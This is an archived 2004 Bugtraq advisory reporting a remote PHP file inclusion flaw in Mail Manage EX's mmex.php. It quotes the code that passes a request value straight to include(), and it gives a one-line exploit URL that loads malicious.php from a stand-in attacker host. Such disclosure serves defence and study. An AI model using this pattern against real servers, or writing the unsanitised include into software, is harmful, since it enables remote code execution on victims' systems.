lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 3 Jun 2004 17:36:44 +0200
From: "JvdR" <thewarlock@...e.nl>
To: <bugtraq@...urityfocus.com>
Subject: PHP Include Exploit in Mail Manage EX  v3.1.8 and maybe others.


Description: PHP Include Exploit in Mail Manage EX  v3.1.8
Compromise: a malicious PHP script from an external host may be included and
executed.
Vulnerable Systems: all system using mmex.php v3.1.8 and maybe lower (not
tested).
Details:
The PHP Include exploit exist in de folowing code,

mmex.php--SNIP----->
#===========================================================
# Register Globals
#===========================================================

$Settings = $_REQUEST['Settings'];
$Refresh = $_REQUEST['Refresh'];
$FormRecipient = $_REQUEST['Recipient'];
$EMAIL[0] = $_REQUEST['email'];
$EMAIL[1] = $_REQUEST['Email'];
$EMAIL[2] = $_REQUEST['E_mail'];
$EMAIL[3] = $_REQUEST['e_mail'];
$EMAIL[4] = $_REQUEST['email_address'];
$EMAIL[5] = $_REQUEST['Email_Address'];
$EMAIL[6] = $_REQUEST['Email_address'];

#===========================================================
# CHECK SETTINGS & FORM RECIPIENT
#===========================================================
if(!$Settings)
  exit ("<b>No settings were found for this form.</b>");

$Include = @include($Settings);
if (!$Include)
 exit ("<b>Incorrect settings filename in your form or specified file does
not exist.</b>");
mmex.php---EOF----->

"$Settings" can be used to Include malicious PHP code.

How to exploit this bug?

http://www.target.com/mail/mmex.php?Setings=http://www.h4x0r.b0x/malicious.p
hp

malicious.php is executed by the target.


Solution:
No solution provided.
Gregg Kenneth Jewell of "Mail Manage EX" is informed.

Greetings,


Jan van de Rijt aka The Warlock.
http://members.home.nl/thewarlock/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ